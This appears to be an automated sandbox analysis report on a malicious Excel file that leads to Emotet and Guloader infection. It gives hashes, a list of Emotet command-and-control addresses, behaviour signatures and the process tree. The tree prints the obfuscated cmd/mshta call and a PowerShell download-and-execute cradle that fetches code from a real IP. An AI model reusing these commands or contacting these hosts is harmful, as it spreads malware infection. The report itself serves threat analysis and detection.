Analysis
-
max time kernel
124s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
21-01-2022 03:22
Behavioral task
behavioral1
Sample
Contact.xls
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
Contact.xls
Resource
win10v2004-en-20220112
General
-
Target
Contact.xls
-
Size
70KB
-
MD5
e04cb27b9dc90bc46db1427db6c0a1e9
-
SHA1
f87d71f6ac3588b9c5da2587801c320633783b04
-
SHA256
d5b77f3b4a645ee3c6a166172d9b1d5c48f0228ba8cee64332af3cddab84e4a0
-
SHA512
c01e9f94b6a319b6f208edbffb16790613a3f207b8a2113534a1c910241b71373e787b3ee394333babf7b014604f3140d5a16385dcdef007f91324584065f09f
Malware Config
Extracted
http://0xb907d607/fer/fe2.html
Extracted
http://185.7.214.7/fer/fe2.png
Extracted
emotet
Epoch4
131.100.24.231:80
209.59.138.75:7080
103.8.26.103:8080
51.38.71.0:443
212.237.17.99:8080
79.172.212.216:8080
207.38.84.195:8080
104.168.155.129:8080
178.79.147.66:8080
46.55.222.11:443
103.8.26.102:8080
192.254.71.210:443
45.176.232.124:443
203.114.109.124:443
51.68.175.8:8080
58.227.42.236:80
45.142.114.231:8080
217.182.143.207:443
178.63.25.185:443
45.118.115.99:8080
103.75.201.2:443
104.251.214.46:8080
158.69.222.101:443
81.0.236.90:443
45.118.135.203:7080
176.104.106.96:8080
212.237.56.116:7080
216.158.226.206:443
173.212.193.249:8080
50.116.54.215:443
138.185.72.26:8080
41.76.108.46:8080
212.237.5.209:443
107.182.225.142:8080
195.154.133.20:443
162.214.50.39:7080
110.232.117.186:8080
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2552 2448 cmd.exe EXCEL.EXE -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 3668 created 2268 3668 WerFault.exe mshta.exe -
Guloader Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3812-246-0x000001D05EDD0000-0x000001D076FC0000-memory.dmp family_guloader -
Blocklisted process makes network request 5 IoCs
Processes:
mshta.exepowershell.exerundll32.exeflow pid process 37 2268 mshta.exe 54 3812 powershell.exe 57 3812 powershell.exe 81 2260 rundll32.exe 85 2260 rundll32.exe -
Downloads MZ/PE file
-
Sets service image path in registry 2 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
mshta.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation mshta.exe -
Loads dropped DLL 4 IoCs
Processes:
rundll32.exerundll32.exerundll32.exerundll32.exepid process 3840 rundll32.exe 2924 rundll32.exe 3684 rundll32.exe 2260 rundll32.exe -
Drops file in System32 directory 1 IoCs
Processes:
rundll32.exedescription ioc process File opened for modification C:\Windows\SysWOW64\Mkbak\ipfh.nxy rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 1080 2268 WerFault.exe mshta.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
Processes:
EXCEL.EXEWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies data under HKEY_USERS 41 IoCs
Processes:
WaaSMedicAgent.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs WaaSMedicAgent.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs WaaSMedicAgent.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2448 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exeWerFault.exerundll32.exepid process 3812 powershell.exe 1080 WerFault.exe 1080 WerFault.exe 3812 powershell.exe 2260 rundll32.exe 2260 rundll32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3812 powershell.exe -
Suspicious use of SetWindowsHookEx 14 IoCs
Processes:
EXCEL.EXEpid process 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE 2448 EXCEL.EXE -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
EXCEL.EXEcmd.exemshta.exeWerFault.exepowershell.execmd.exerundll32.exerundll32.exerundll32.exedescription pid process target process PID 2448 wrote to memory of 2552 2448 EXCEL.EXE cmd.exe PID 2448 wrote to memory of 2552 2448 EXCEL.EXE cmd.exe PID 2552 wrote to memory of 2268 2552 cmd.exe mshta.exe PID 2552 wrote to memory of 2268 2552 cmd.exe mshta.exe PID 2268 wrote to memory of 3812 2268 mshta.exe powershell.exe PID 2268 wrote to memory of 3812 2268 mshta.exe powershell.exe PID 3668 wrote to memory of 2268 3668 WerFault.exe mshta.exe PID 3668 wrote to memory of 2268 3668 WerFault.exe mshta.exe PID 3812 wrote to memory of 3536 3812 powershell.exe cmd.exe PID 3812 wrote to memory of 3536 3812 powershell.exe cmd.exe PID 3536 wrote to memory of 3840 3536 cmd.exe rundll32.exe PID 3536 wrote to memory of 3840 3536 cmd.exe rundll32.exe PID 3536 wrote to memory of 3840 3536 cmd.exe rundll32.exe PID 3840 wrote to memory of 2924 3840 rundll32.exe rundll32.exe PID 3840 wrote to memory of 2924 3840 rundll32.exe rundll32.exe PID 3840 wrote to memory of 2924 3840 rundll32.exe rundll32.exe PID 2924 wrote to memory of 3684 2924 rundll32.exe rundll32.exe PID 2924 wrote to memory of 3684 2924 rundll32.exe rundll32.exe PID 2924 wrote to memory of 3684 2924 rundll32.exe rundll32.exe PID 3684 wrote to memory of 2260 3684 rundll32.exe rundll32.exe PID 3684 wrote to memory of 2260 3684 rundll32.exe rundll32.exe PID 3684 wrote to memory of 2260 3684 rundll32.exe rundll32.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Contact.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta http://0xb907d607/fer/fe2.html3⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWow64\rundll32.exeC:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString6⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer7⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mkbak\ipfh.nxy",zUpM8⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mkbak\ipfh.nxy",DllRegisterServer9⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2268 -s 17044⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p1⤵
-
C:\Windows\System32\WaaSMedicAgent.exeC:\Windows\System32\WaaSMedicAgent.exe 733ffa9d30a0a3a8f077b96337298a3b u3pCchQsYkujnCz7FYwSeA.0.1.0.0.01⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 436 -p 2268 -ip 22681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Suspicious use of WriteProcessMemory
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Public\Documents\ssd.dllMD5
f1eb9fcef8fdfa315b3b1697acbf3130
SHA132ea2aedbdbd45db0899eff996b550c4518f9aad
SHA25661d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d
SHA512cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1
-
C:\Users\Public\Documents\ssd.dllMD5
f1eb9fcef8fdfa315b3b1697acbf3130
SHA132ea2aedbdbd45db0899eff996b550c4518f9aad
SHA25661d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d
SHA512cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1
-
C:\Users\Public\Documents\ssd.dllMD5
f1eb9fcef8fdfa315b3b1697acbf3130
SHA132ea2aedbdbd45db0899eff996b550c4518f9aad
SHA25661d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d
SHA512cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1
-
C:\Windows\SysWOW64\Mkbak\ipfh.nxyMD5
f1eb9fcef8fdfa315b3b1697acbf3130
SHA132ea2aedbdbd45db0899eff996b550c4518f9aad
SHA25661d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d
SHA512cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1
-
C:\Windows\SysWOW64\Mkbak\ipfh.nxyMD5
f1eb9fcef8fdfa315b3b1697acbf3130
SHA132ea2aedbdbd45db0899eff996b550c4518f9aad
SHA25661d6429b74d34e8399c21e5c03a04295dbe4228956b471858a3178fae2fce76d
SHA512cc672a8b6d256963bedc0885c2d2691892f2e791839eb530147bbfe1fbb56b8af28c2dac6f8676836881a5379fdc809c86b2b566f3f60d352e0ae3457d6adeb1
-
memory/2260-383-0x0000000005370000-0x0000000005396000-memory.dmpFilesize
152KB
-
memory/2260-378-0x00000000051A0000-0x00000000051C6000-memory.dmpFilesize
152KB
-
memory/2260-416-0x0000000005860000-0x0000000005886000-memory.dmpFilesize
152KB
-
memory/2260-414-0x00000000057D0000-0x00000000057F6000-memory.dmpFilesize
152KB
-
memory/2260-380-0x0000000005200000-0x0000000005226000-memory.dmpFilesize
152KB
-
memory/2260-393-0x00000000053D0000-0x00000000053F6000-memory.dmpFilesize
152KB
-
memory/2260-395-0x0000000005500000-0x0000000005526000-memory.dmpFilesize
152KB
-
memory/2260-407-0x00000000056F0000-0x0000000005716000-memory.dmpFilesize
152KB
-
memory/2260-374-0x0000000004940000-0x0000000004966000-memory.dmpFilesize
152KB
-
memory/2260-376-0x00000000050C0000-0x00000000050E6000-memory.dmpFilesize
152KB
-
memory/2448-138-0x00007FFB374C0000-0x00007FFB374D0000-memory.dmpFilesize
64KB
-
memory/2448-410-0x00007FFB39C70000-0x00007FFB39C80000-memory.dmpFilesize
64KB
-
memory/2448-412-0x00007FFB39C70000-0x00007FFB39C80000-memory.dmpFilesize
64KB
-
memory/2448-132-0x00007FFB39C70000-0x00007FFB39C80000-memory.dmpFilesize
64KB
-
memory/2448-411-0x00007FFB39C70000-0x00007FFB39C80000-memory.dmpFilesize
64KB
-
memory/2448-413-0x00007FFB39C70000-0x00007FFB39C80000-memory.dmpFilesize
64KB
-
memory/2448-137-0x00007FFB374C0000-0x00007FFB374D0000-memory.dmpFilesize
64KB
-
memory/2448-134-0x00007FFB39C70000-0x00007FFB39C80000-memory.dmpFilesize
64KB
-
memory/2448-133-0x00007FFB39C70000-0x00007FFB39C80000-memory.dmpFilesize
64KB
-
memory/2448-130-0x00007FFB39C70000-0x00007FFB39C80000-memory.dmpFilesize
64KB
-
memory/2448-131-0x00007FFB39C70000-0x00007FFB39C80000-memory.dmpFilesize
64KB
-
memory/2924-364-0x0000000004930000-0x0000000004956000-memory.dmpFilesize
152KB
-
memory/2924-369-0x0000000004B10000-0x0000000004B36000-memory.dmpFilesize
152KB
-
memory/2924-366-0x0000000004990000-0x00000000049B6000-memory.dmpFilesize
152KB
-
memory/2924-362-0x0000000004820000-0x0000000004846000-memory.dmpFilesize
152KB
-
memory/2924-360-0x0000000004740000-0x0000000004766000-memory.dmpFilesize
152KB
-
memory/3684-371-0x0000000004A00000-0x0000000004A26000-memory.dmpFilesize
152KB
-
memory/3812-359-0x000001D0775C0000-0x000001D077636000-memory.dmpFilesize
472KB
-
memory/3812-248-0x000001D0771A0000-0x000001D0771E4000-memory.dmpFilesize
272KB
-
memory/3812-246-0x000001D05EDD0000-0x000001D076FC0000-memory.dmpFilesize
385.9MB
-
memory/3812-245-0x000001D05EDD0000-0x000001D076FC0000-memory.dmpFilesize
385.9MB
-
memory/3812-243-0x000001D05EDD0000-0x000001D076FC0000-memory.dmpFilesize
385.9MB
-
memory/3812-242-0x000001D077120000-0x000001D077142000-memory.dmpFilesize
136KB